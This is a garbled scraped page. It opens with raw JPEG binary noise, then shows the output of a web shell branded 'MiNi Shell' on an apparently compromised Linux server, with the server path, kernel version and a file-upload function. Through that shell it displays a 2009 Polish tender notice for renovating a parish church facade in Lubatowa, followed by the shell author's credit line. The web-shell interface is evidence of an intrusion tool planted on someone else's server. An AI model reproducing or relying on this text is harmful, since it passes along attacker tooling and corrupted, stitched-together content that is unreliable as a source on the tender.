JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090706/225382-N-2009.html

<p class="kh_header"><b>Lubatowa: Remont elewacji kościoła pw 
św. Stanisława Biskupa w Lubatowej</b><br>
<b>Numer ogłoszenia: 225382 - 2009; data zamieszczenia: 06.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Parafia Rzymskokatolicka pw. św. Stanisława Biskupa w Lubatowej , Lubatowa 292, 38-440 Lubatowa, woj. podkarpackie, tel. 0-13 425 10 04, faks 0-13 425 10 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubatowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: parafia rzymsko-katolicka.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont elewacji kościoła pw 
św. Stanisława Biskupa w Lubatowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odnowienie elewacji zabytkowego kościoła parafialnego p.w. św. Stanisława Biskupa w Lubatowej etap 1. Zamówienie obejmuje: 
1.	odnowienie elewacji, wykonanie rekonstrukcji ubytków cegły, impregnacja wzmacniająca kamień i cegłę, rekonstrukcja cokołu i kamienia oraz konserwacja okien w zakresie etapu I.
2.	Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 7 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.61-4, 45.21.23.50-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
a) nie podlegają wykluczeniu z postępowania na mocy art. 24 ust.1 i ust. 2,
b) spełniają  warunki art. 22 ust. 1 ustawy Prawo zamówień  publicznych (tekst jednolity: 
Dz. U. z 2007 r., Nr 223, poz. 1655 z późn. zm.),
c) zrealizowali w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania
o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym
okresie, co najmniej dwa zamówienia (potwierdzone dokumentami, że roboty te zostały
wykonane należycie) odpowiadające swoim rodzajem robotom budowlanym
stanowiącym przedmiot zamówienia tj. o wartości nie mniejszej niż   100 tysięcy
złotych brutto polegające na remoncie elewacji budynku wpisanego do rejestru
zabytków w każdym zadaniu;
d) dysponują  lub będą  dysponować  osobami legitymującymi się  doświadczeniem i
kwalifikacjami odpowiednimi do stanowisk, jakie zostaną im powierzone, tj.:

L.p.	Stanowisko	Doświadczenie jako kierownik robót    	Wymagana liczba osób
1	Kierownik budowy 	(posiadający co najmniej 5 lat  
uprawnienia w branży ogólnobudowlanej
lub architektonicznej)
	1 osoba
2	Kierownik prac konserwatorskich              	co najmniej 5 lat  
	1 osoba
Kierownik budowy musi posiadać uprawnienia budowlane wymagane zgodnie z ustawą
Prawo budowlane, zaś  osoba z uprawnieniami budowlanymi wydanymi po 14.02.1995
r. odpowiednio decyzję o wpisie do centralnego rejestru prowadzonego przez Głównego
Inspektora Nadzoru Budowlanego, ponadto musi posiadać  aktualne zaświadczenia o
wpisie na listę członków właściwej Izby Samorządu Zawodowego.
Kierownik budowy musi posiadać  wykształcenie, kwalifikacje i do świadczenie
zawodowe niezbędne do wykonywania zamówienia określone przepisami
rozporządzenia Ministra Kultury w sprawie prowadzenia robót konserwatorskich,
restauratorskich, robót budowlanych, bada  konserwatorskich i architektonicznych, a
także innych działań  przy zabytku wpisanym do rejestru zabytków oraz badań
archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych z dnia
9 czerwca 2004 r. (Dz. U. Nr 150, poz. 1579).
Zgodnie z wyżej wymienionym rozporządzeniem (§ 8 ust. 1):
Robotami budowlanymi przy zabytkach nieruchomych mogą  kierować  osoby, które
posiadają  odpowiednie uprawnienia budowlane określone przepisami Prawa
budowlanego oraz odbyły co najmniej 2-letnią  praktykę  zawodową  na budowie przy
zabytkach nieruchomych.
Kierownik prac konserwatorskich musi posiadać  wykształcenie, kwalifikacje i
doświadczenie zawodowe niezbędne do wykonywania zamówienia określone
przepisami rozporządzenia Ministra Kultury w sprawie prowadzenia robót
konserwatorskich, restauratorskich, robót budowlanych, bada  konserwatorskich i
architektonicznych, a także innych działa przy zabytku wpisanym do rejestru zabytków
oraz badań  archeologicznych i poszukiwań  ukrytych lub porzuconych zabytków
ruchomych z dnia 9 czerwca 2004 r. (Dz. U. Nr 150, poz. 1579).
Zgodnie z wyżej wymienionym rozporządzeniem (§ 7 ust. 1):
Prace konserwatorskie, prace restauratorskie lub badania konserwatorskie mogą
prowadzić  osoby, które posiadają  tytuł zawodowy magistra uzyskany po ukończeniu
wyższych studiów na kierunku konserwacja i restauracja dzieł sztuki lub wyższych
studiów w specjalności w zakresie konserwacji zabytków oraz odbyły po ukończeniu
tych studiów co najmniej 12-miesięczną  praktykę  zawodową w zakresie konserwacji i
badania zabytków..
2. Zamawiający oceni spełnienie przez Wykonawców warunków udziału w postępowaniu na
podstawie analizy dokumentów i oświadczeń  przedłożonych w ofertach przez
Wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie zgodne z wymogiem art. 22 ust. 1 ustawy Prawo zamówień  publicznych
( załącznik nr 2 do SIWZ ).
2. Oświadczenie o niepodleganiu wykluczeniu na podstawie art. 24 ustawy Prawo zamówień
publicznych ( załącznik nr 3 do SIWZ ).
3.  Aktualny  odpis z właściwego rejestru, albo aktualne zaświadczenie o wpisie do ewidencji
działalności gospodarczej, jeżeli odrębne przepisy wymagają  wpisu do rejestru lub
zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy 
przed upływem terminu składania ofert.
4. Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą
uczestniczy  w wykonywaniu zamówienia w branży ogólnobudowlanej lub architektonicznej 
oraz w zakresie prac konserwatorskich wraz z informacjami na temat ich
kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnychych do jego wykonania
na formularzu zgodnym ze wzorem stanowiącym  załącznik Nr 4 do SIWZ . Do oferty
należy załączyć : kopie życiorysów zawodowych (dla wszystkich osób), uprawnień
budowlanych, zaś  dla osób z uprawnieniami budowlanymi wydanymi po 14.02.1995 r
odpowiednio decyzję  o wpisie do centralnego rejestru prowadzonego przez Głównego
Inspektora Nadzoru Budowlanego oraz aktualne zaświadczenie z właściwej izby samorządu
zawodowego (dla kierownika budowy) potwierdzające spełnienie warunku opisanego w
rozdz. VIII pkt 1.2 b SIWZ.
5. Pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania
zamówienia, jeżeli w wykazie, o którym mowa w pkt 8, wykonawca wskazał osoby,
którymi będzie dysponował na załączniku nr 2 a do SIWZ.
6. Wykaz, co najmniej dwóch zamówień  zrealizowanych w okresie ostatnich 5 lat, a jeżeli
okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim
rodzajem i wartości  robotom budowlanym stanowiącym przedmiot zamówienia zgodnie z
warunkiem opisanym w rozdz. VIII pkt 1 c. Należy wypełnić załącznik nr 5 do SIWZ.
7. Dokumenty potwierdzające, że roboty wykazane w załączniku nr 5  zostały wykonane
należycie.
8. Zgodnie z art. 23 ust.1 Prawa zamówień publicznych wykonawcy mogą  wspólnie ubiegać
się o udzielenie zamówienia składając następujące dokumenty:
a) Każdy z wykonawców wspólnie ubiegających się  o udzielenie zamówienia składa
oddzielne dokumenty wymienione w pkt 1, 2, 3.
b) Oświadczenie o ustanowieniu pełnomocnika reprezentującego wykonawców wspólnie
ubiegających się  o udzielenie zamówienia i upoważnionego do podpisania w ich
imieniu umowy na realizację zamówienia.
c) W formularzu oferty oraz na załącznikach wpisywane będą  dane wykonawcy
zbiorowego i podpisywane będą przez upoważnionego pełnomocnika.
d) Jeżeli oferta wykonawców, o których mowa w ust. 8 lit. a, zostanie wybrana
Zamawiający wymagać  będzie przed zawarciem umowy w sprawie nn. zamówienia
publicznego umowy regulującej współpracę tych Wykonawców.
e) Zgodnie z art.141 Prawa zamówień  publicznych Wykonawcy ponoszą  solidarną
odpowiedzialność  za wykonanie umowy i wniesienie zabezpieczenia należytego
wykonania umowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lubatowa.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.lubatowa.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2009 godzina 10:00, miejsce: w kancelarii Parafii Rzymsko-Katolickiej w Lubatowej, Lubatowa 292, 
38-440 Iwonicz-Zdrój.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com